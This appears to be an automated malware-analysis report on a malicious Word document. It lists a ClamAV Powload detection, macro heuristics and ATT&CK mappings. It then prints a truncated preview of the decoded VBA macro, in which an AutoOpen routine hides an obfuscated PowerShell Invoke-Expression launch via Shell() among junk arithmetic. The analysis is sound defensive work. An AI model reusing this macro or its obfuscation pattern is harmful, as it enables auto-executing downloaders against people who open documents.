Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro uses the Shell() function, a critical indicator of execution, most likely to download and run a secondary payload. The 'Doc.Malware.Powload-6797938-0' ClamAV signature match further confirms its malicious nature.
Heuristics (7)
- ClamAV: Doc.Malware.Powload-6797938-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Powload-6797938-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11938 bytes |

SHA-256 of macros.bas: 4e227dd24e66e02fe0fb3e5e0b8aac11ef2390153ab7926dee403fefad3a3044
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "URjoPfY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zSRJuHbAcactAL"
Function iEMcrhL()
On Error Resume Next
rsaPiE = BzGYL = 95584 / nRERn + 54761 / ChrW(99946) / NrrZcL + ChrW(ujhCU) * 83893 + ChrB(58715 * CInt(tXrXaj) * 8263 - Hex(aKtcha)) + XXvHi - Int(YFbApE) * (rJdZI - KuwEZ)
JIROj = iTTKfY - zPVSPX / (cirRhU + Oct(OQTaS) - 42256 + Log(VZGqs))
rjmmXwSGou = iHQYDj + Chr(cdzzABRzo + vbKeyP + SNumRid) + "owe" + "rs"
LlGhd = oJDpc = 63478 / pbiRAh + 29547 / ChrW(28348) / DAjMC + ChrW(ipOcWG) * 47739 + ChrB(82552 * CInt(JndfK) * 20734 - Hex(rtljbq)) + GIcCv - Int(FwRBHi) * (azKbQ - FHNEjD)
bJpaW = nhHTt - cISLV / (YjwArj + Oct(QqkBt) - 7444 + Log(wqGwIr))
BqjSfQ = nbmvr = 55368 / XIaRF + 30827 / ChrW(10831) / CjOPA + ChrW(mCVCi) * 93622 + ChrB(44483 * CInt(QiLTmd) * 28242 - Hex(FBbibi)) + fDbZmn - Int(EPPTB) * (QsNjo - ssGmdc)
EbNoS = DXqzCX - BPdvET / (phMnut + Oct(qmZRwz) - 71918 + Log(Zrbwpz))
iEMcrhL = trhAatbiUqI + rjmmXwSGou + spmYowUEY + hlUBbn + SZfpmUd
atKIC = cPKiJA = 21421 / OZtYk + 24960 / ChrW(71090) / iEazS + ChrW(mUHiin) * 12805 + ChrB(36353 * CInt(mqLOXO) * 67364 - Hex(waLKRh)) + FkQIL - Int(iDOlc) * (afVXRv - HhYwND)
QdZGjV = jYtWzH - Dnzcu / (IJaCu + Oct(UZqjm) - 6052 + Log(LpFdH))
End Function
Sub AutoOpen()
On Error Resume Next
HDrGc = TnaEu = 52381 / TfrGC + 43543 / ChrW(24825) / ANsrH + ChrW(swjwJ) * 79556 + ChrB(45059 * CInt(UQCwCa) * 51430 - Hex(UwFQkZ)) + iCHuo - Int(pwOUj) * (rtGklw - LaEEUm)
Gtwmrj = bzvCu - jiRoiV / (izOLTS + Oct(Otiwm) - 16724 + Log(AwBcdz))
Application.Run "fJvGEi", iEMcrhL
QwKhr = zjJQZ = 98231 / HGilSZ + 60387 / ChrW(8253) / TzPllj + ChrW(PLBYrS) * 7397 + ChrB(6484 * CInt(cDEhkO) * 46500 - Hex(WptRQK)) + REidN - Int(FdTzt) * (YbvoD - HpVaWz)
ZcPvm = zBzGn - apMWak / (qKzMbA + Oct(pJUiqh) - 69469 + Log(opqhj))
End Sub
Function fJvGEi(uikVYHzobA)
On Error Resume Next
uDbUHE = lvTvql = 14515 / ZPovzb + 80201 / ChrW(63116) / PFACB + ChrW(jtEEv) * 13013 + ChrB(46158 * CInt(TwNEOB) * 74339 - Hex(vciOa)) + ljEFW - Int(FCDaj) * (mCmhL - BXVwjX)
fcOJXX = wfHUzq - LmRsnU / (OkONQr + Oct(CjnAh) - 56743 + Log(jqsfDw))
HvRiVD = lDFwDm = 32748 / AwHfbu + 97395 / ChrW(38036) / SNtcv + ChrW(NkYNH) * 79022 + ChrB(93119 * CInt(voWQch) * 8317 - Hex(rZrqwY)) + VhIbz - Int(IJOqi) * (LiYJDD - MrEdW)
PoVTkE = oNDfwN - PniIaz / (swSQom + Oct(MfQEmp) - 65920 + Log(mqdlBD))
DVWhb = aoJRnhjtiM + Shell(WJscFz + uikVYHzobA + rdjaCzHDc, 600758591 - 600758591) + lYMDuhhIf
bsLpFB = NwDYz = 44214 / CDwRzc + 64509 / ChrW(75005) / LYQnAn + ChrW(owluXa) * 9077 + ChrB(97883 * CInt(dnSTAO) * 85087 - Hex(lknhU)) + bQoRz - Int(pNYZS) * (bLcSc - zkToOT)
zjEBQA = TsJdiI - hsQOt / (lmjiT + Oct(okkjm) - 3664 + Log(qCkkL))
End Function
Function spmYowUEY()
On Error Resume Next
ZBGsik = tLSSmQ - bRDUcD / (DQiLwi + Oct(PDitIw) - 25390 + Log(GsdCAD))
sAuuFR = hjGBK = 47703 / jiuXa + 8791 / ChrW(87634) / lRHcD + ChrW(WziEfO) * 7496 + ChrB(2306 * CInt(PEfnjP) * 61655 - Hex(iazqnM)) + KUvlO - Int(mcNkLm) * (ziKOfp - TvQNrF)
coZYHRT = "hell " + " iNVoKE-" + "expREsSI" + "On" + Chr(40) + " [sTR" + "Ing]::jo" + "In" + Chr(40) + "'', "
uXPYLb = wZwKaQ - EXvAT / (ppIzHb + Oct(wlfFis) - 29101 + Log(rnMfqF))
rwsYB = dNsOCr = 41267 / XjjCtd + 15682 / ChrW(68453) / iUQAK + ChrW(qaDkk) * 46911 + ChrB(74378 * CInt(ahrmp) * 81684 - Hex(GErpjM)) + AHaKIW - Int(DlqSD) * (owGkN - NIUBrS)
BtwmEMWn = Chr(40) + "'16,10" + "2e94&" + "92D9&90," + "81~67O25" + "D91O86" + "D94&8" + "1,87e64" + "{20-12" + "2O81{64" + "e26{" + "99~81s86s" + "119D88"
OCwKz = IlZBX = 61164 / FPRRj + 57132 / ChrW(98740) / urbhB + ChrW(NjjVch) * 69657 + ChrB(52154 * CInt(Bwicq) * 168 - Hex(ELMLW)) + WvvNFt - Int(LUcwj) * (CpfvwT - JQUFAJ)
omQVp = lNnaP - qGujUi / (vzQYPO + Oct(sSFbpM) - 93636 + Log(fYEHGP))
aJqvjk = "~93~" + "81e90&" + "64e15D16&" + "109O8" + "9s123e9R1" + "9~92
... (truncated)